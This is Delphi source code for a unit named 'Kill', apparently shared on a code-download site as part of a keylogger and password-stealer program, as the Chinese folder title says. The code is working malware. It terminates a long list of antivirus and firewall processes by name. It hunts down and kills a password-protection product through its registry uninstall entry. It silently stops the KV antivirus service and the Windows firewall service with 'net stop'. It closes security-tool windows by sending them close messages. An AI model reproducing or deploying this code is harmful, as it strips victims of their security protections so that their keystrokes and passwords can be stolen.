📄 kill.pas

📁 键盘全记录密码盗取发送程序源代码
💻 PAS
字号:
unit Kill;

interface

uses
   Windows,ShellAPI,TLHelp32;

Function  KillProcess(TheProcName:String):boolean; 
procedure Killer;

implementation

function AnsiCompareText(const S1, S2: string): Integer;
begin
  Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1),
    Length(S1), PChar(S2), Length(S2)) - 2;
end;
function UpperCase(AStr:string):string; overload;
var
 LI:Integer;
begin
 Result:=AStr;
 for LI:=1 to Length(Result) do
  Result[LI]:=System.UpCase(Result[LI]);
end;
function ExtractFilePath(APath:string):string;
var
 LI,LJ:Integer;
begin
 if (Length(APath)<>0) and (Pos('\',APath)>0) then
 begin
  LJ:=0;
  for LI:=Length(APath) downto 1 do
   if APath[LI]='\' then
   begin
    LJ:=LI;
    Break;
   end;
  Result:=Copy(APath,1,LJ);
 end else Result:='';
end;
function ExtractFileName(APath:string):string;
var
 LI,LJ:Integer;
begin
 if Length(APath)<>0 then
 begin
  LJ:=0;
  for LI:=Length(APath) downto 1 do
   if APath[LI]='\' then
   begin
    LJ:=LI;
    Break;
   end;
  Result:=Copy(APath,LJ+1,MaxInt);
 end else Result:='';
end;
function OpenKey(Root:HKEY;StrPath:pchar):Hkey;
var TempKey:Hkey;
begin
	TempKey:=0;
	RegOpenKeyEx(Root,StrPath,0,KEY_ALL_ACCESS,TempKey);
	Result:=TempKey;
end;
function ReadValue(Root:HKEY;StrPath:pchar;StrValue:pchar):String;
var s:Hkey; ValueType:DWORD; MyData: array[0..255] of char; dLength: DWORD;
begin
	ValueType:=REG_SZ;
	s:=OpenKey(Root,StrPath);
	dLength := SizeOf(MyData);
	if RegQueryValueEx(s,StrValue,nil,@ValueType,@MyData[0],@dLength)=0 then begin
		Result:=MyData;
		RegCloseKey(s);
	end else begin
		Result:='';
		RegCloseKey(s);
	end;
end;
//-------------------------------------------------------------------------




Function KillProcess(TheProcName:String):boolean;
var  
    isOK:Boolean;
    ProcessHandle:Thandle;
    ProcessStruct:TProcessEntry32;
    Function KillProcessID(ProcessID:Cardinal):boolean;
      var
      H:THandle;
      begin
      H:=OpenProcess(Process_All_Access, true,ProcessID);
      Result:=TerminateProcess(H,0);
      end;
begin
   ProcessHandle:=createtoolhelp32snapshot(Th32cs_snapprocess,0);
     processStruct.dwSize:=sizeof(ProcessStruct);
     isOK:=process32first(ProcessHandle,ProcessStruct);
     while isOK do
     begin
  	 if TheProcName=ProcessStruct.szExeFile then
         begin
            Result:=KillProcessID(ProcessStruct.th32ProcessID);  
            CloseHandle(ProcessHandle);
            exit;    
         end;       
	 isOK:=process32next(ProcessHandle,ProcessStruct);
     end;       
     CloseHandle(ProcessHandle);
end;


procedure Killpro(s: string);
var
  lppe: tprocessentry32;
  sshandle: thandle;
  hh: hwnd;
  found: boolean;
begin
  sshandle := createtoolhelp32snapshot(TH32CS_SNAPALL, 0);
  found := process32first(sshandle, lppe);
  while found do
  begin
    if (uppercase(extractfilename(lppe.szExeFile)) = s) or
      (uppercase(lppe.szExeFile) = s) then
    begin
      hh := OpenProcess(PROCESS_ALL_ACCESS, true, lppe.th32ProcessID);
      TerminateProcess(hh, 0);
    end;
    found := process32next(sshandle, lppe);
  end;
  CloseHandle(sshandle);
end;

procedure KillZhuanJia;
var
  found: boolean;
  s,path:string;
  i:integer;
  h,FindHandle: THandle;
  FindData: TWin32FindData;
begin
  path:=ReadValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\密码防盗专家 综合版','UninstallString');
  if path='' then exit;
  i:=pos(' ',path);
  if i<>0 then delete(path,i,MaxInt);
  path:=extractfilepath(Path);
  FindHandle := FindFirstFile(PChar(path + '*.exe'), FindData);
  s:='';
  Found := FindHandle <> INVALID_HANDLE_VALUE;
  while Found do begin //如果找到stg文件
{    if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0)or
    (Ansicomparetext(FindData.cFileName,'UNWISE.EXE')=0)or
    (Ansicomparetext(FindData.cFileName,'autoupdate.exe')=0)or
    (Ansicomparetext(FindData.cFileName,'magic.exe')=0)then }
    if ((FindData.cFileName[0]>='0')and(FindData.cFileName[0]<='9'))or
       (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
    begin
      h:=Integer(CreateFile(PChar(path+FindData.cFileName), GENERIC_WRITE,
        0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0));
      if h= INVALID_HANDLE_VALUE then
      begin
        s:=uppercase(FindData.cFileName);
        //Messagebox(0,pchar(s),'',0);
        KillPro(s);
        if (Ansicomparetext(FindData.cFileName,'PasswordGuard.exe')=0) then
          KillPro(uppercase('PasswordGuard.e'));
      end
      else CloseHandle(h);
    end;
    Found := FindNextFile(FindHandle, FindData);
  end;
  Windows.FindClose(FindHandle);
end;


procedure Killer;
var
  s, Desktop: integer;
  str: array[0..100] of char;
begin
  KillZhuanJia;
  Killpro('EGHOST.EXE');
  Killpro('KVMonXP.EXE');
  Killpro('Kvsrvxp.EXE');
  Killpro('KVSrvXp_1.EXE');
  Killpro('KpopMon.EXE');
  Killpro('KavPFW.EXE');
  Killpro('kavstart.EXE');
  Killpro('Rtvscan.EXE');
  Killpro('Nvsvc32.EXE');
  Killpro('VPTray.EXE');
  Killpro('RAVMON.EXE');
  Killpro('RAVMOND.EXE');
  Killpro('RAVTIMER.EXE');
  Killpro('RavService.EXE');
  Killpro('CCENTER.EXE');
  Killpro('Kav.EXE');
  Killpro('kav32.EXE');
  Killpro('RfwMain.EXE');
  Killpro('RRfwMain.EXE');
  Killpro('PFW.exe');
  ShellExecute(0, 'open', 'net.exe',' stop KVSrvXP.EXE', nil, SW_HIDE);
  ShellExecute(0, 'open', 'net.exe',' stop sharedaccess', nil,SW_HIDE);

  s:=FindWindow(nil,'江民杀毒软件 KV2004：实时监视');
  if s<>0 then PostMessage(s,$0012,0,0);
  s := findwindow(pchar('RavMonClass'), pchar('RavMon.exe'));
  Sendmessage(s, $0010, 0, 0);
  s := findwindow('Tapplication', '天网防火墙个人版');
  Sendmessage(s, $0010, 0, 0);
  s := findwindow('Tapplication', '天网防火墙企业版');
  Sendmessage(s, $0010, 0, 0);
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 9);
    if str = '木马克星' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  s := 0;
  Desktop := GetDesktopWindow;
  repeat
    s := findwindowex(Desktop, s, 'TForm1', nil);
    getwindowtext(s, str, 7);
    if str = '噬菌体' then
      sendmessage(s, $0010, 0, 0);
  until s = 0;
  s := findwindow(pchar('TfLockDownMain'), nil);
  Sendmessage(s, $0010, 0, 0);
  s := findwindow(pchar('ZAFrameWnd'), pchar('ZoneAlarm'));
  Sendmessage(s, $0010, 0, 0);
end;



end.
💿 文件大小 997 K
👤 上传用户 a14331510z
📂 所属分类 CA认证
🏷️ 相关标签

#键盘 #记录 #密码 #发送
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -